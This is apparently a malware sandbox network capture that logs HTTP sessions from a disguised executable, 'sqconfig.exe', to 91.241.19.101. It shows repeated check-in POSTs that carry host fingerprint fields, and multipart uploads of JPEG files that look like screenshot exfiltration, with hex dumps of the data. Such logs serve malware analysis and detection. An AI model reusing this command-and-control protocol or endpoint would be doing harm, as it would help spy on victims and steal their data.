                                                                  Sep 30, 2021 23:53:04.123611927 CEST9394OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:04.123986006 CEST9405OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:04.124314070 CEST9407OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:04.260763884 CEST9445OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:04.260963917 CEST9452OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:04.393518925 CEST9466OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:04.393625975 CEST9476OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:04.393887997 CEST9487OUTData Raw: a6 b7 01 c3 a5 25 28 a4 3d 69 bd 84 14 52 52 8e b4 80 70 a7 81 4d 14 b5 68 97 b8 bc 52 d2 67 de 8a 60 3a 96 90 50 29 a2 47 51 49 4b 4c 41 40 a2 8a 62 1e 39 a5 a6 8e 94 e0 69 a1 0b 4b da 9b 9a 75 51 21 4e a6 8a 70 a6 26 2d 2d 14 76 a6 48 b4 66 90
                                                                  Data Ascii: %(=iRRpMhRg`:P)GQIKLA@b9iKuQ!Np&--vHfRJZhC-5iD1)RR\R:TH-|-D>KDE JD)S)M8qV~<t-?3iE1)q Su%-4&>SUf2SDH)4jcSPh4i(L
                                                                  Sep 30, 2021 23:53:04.393919945 CEST9489OUTData Raw: 8c 93 dc fc a3 00 7b 9a c2 82 7f 17 f8 81 45 dd b4 b6 fa 2d 93 f3 12 bc 42 59 59 7b 12 08 c7 3f 85 41 ac a0 bd 9f c1 9a 6c dc db 4c 7c d9 13 b3 14 8d 48 07 db 93 f9 d4 9e 35 d6 75 1b 7d 4f 4c d2 34 fb b4 b1 fb 59 25 ee 5f 1c 0c e0 0c f6 ff 00 f5
                                                                  Data Ascii: {E-BYY{?AlL|H5u}OL4Y%_TPTR%u|]Eik1"Tl-A%1\MSn!}z:%!M?=.|bG?*+V5giP[Wv
                                                                  Sep 30, 2021 23:53:04.393949986 CEST9497OUTData Raw: 58 da 39 35 fb c7 47 05 59 59 81 04 1e a0 8c 55 3d 22 c3 45 d5 75 99 a4 91 af 6c b4 5b 78 3c eb 82 f2 24 92 c7 c8 50 03 05 01 b2 ec bf c2 38 27 8e 33 57 21 f0 9c 0b 7b 65 05 dc d2 a2 47 7f 73 6b a9 3a 95 f9 12 15 12 16 4c 8e 33 1e e2 33 9e 47 e1
                                                                  Data Ascii: X95GYYU="Eul[x<$P8'3W!{eGsk:L33GG54(ns1[:g;I$p59!mxs]0AZ#QI](r?&WMLQE0KEHL;QEZ(S@vBRGjCE4Q@SLL(BZAKLAJ)){hbJ
                                                                  Sep 30, 2021 23:53:04.613078117 CEST9513INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  47192.168.2.34983391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:04.450473070 CEST9511OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:04.645339966 CEST9513INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  48192.168.2.34983691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:04.974306107 CEST9521OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:05.182554960 CEST9548INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  49192.168.2.34983791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:05.067909002 CEST9521OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:05.068051100 CEST9522OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:05.068208933 CEST9532OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:05.068309069 CEST9534OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:05.187263012 CEST9553OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:05.187294960 CEST9556OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:05.187306881 CEST9561OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:05.187519073 CEST9568OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:05.187540054 CEST9573OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:05.308063030 CEST9663OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:05.309093952 CEST9669OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:05.498810053 CEST9812INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.34976491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:50.592958927 CEST7148OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86299
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:50.593164921 CEST7148OUTData Raw: 2d 2d 2d 2d 2d 2d 61 39 32 35 62 63 32 33 30 66 64 62 65 65 63 37 32 61 32 36 36 65 61 39 37 64 36 65 62 32 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------a925bc230fdbeec72a266ea97d6eb24eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:50.593353033 CEST7158OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:50.593417883 CEST7161OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:50.724560976 CEST7164OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:50.724661112 CEST7167OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:52:50.724932909 CEST7175OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:52:50.725004911 CEST7186OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:52:50.857474089 CEST7198OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:52:50.857532978 CEST7200OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:52:50.857563972 CEST7214OUTData Raw: a6 b7 01 c3 a5 25 28 a4 3d 69 bd 84 14 52 52 8e b4 80 70 a7 81 4d 14 b5 68 97 b8 bc 52 d2 67 de 8a 60 3a 96 90 50 29 a2 47 51 49 4b 4c 41 40 a2 8a 62 1e 39 a5 a6 8e 94 e0 69 a1 0b 4b da 9b 9a 75 51 21 4e a6 8a 70 a6 26 2d 2d 14 76 a6 48 b4 66 90
                                                                  Data Ascii: %(=iRRpMhRg`:P)GQIKLA@b9iKuQ!Np&--vHfRJZhC-5iD1)RR\R:TH-|-D>KDE JD)S)M8qV~<t-?3iE1)q Su%-4&>SUf2SDH)4jcSPh4i(L
                                                                  Sep 30, 2021 23:52:51.068262100 CEST7236INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  50192.168.2.34983991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:05.431365967 CEST9805OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:05.645606041 CEST9813INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  51192.168.2.34984091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:06.277013063 CEST9815OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:06.461422920 CEST9855INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  52192.168.2.34984191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:06.284792900 CEST9816OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:06.284868956 CEST9816OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
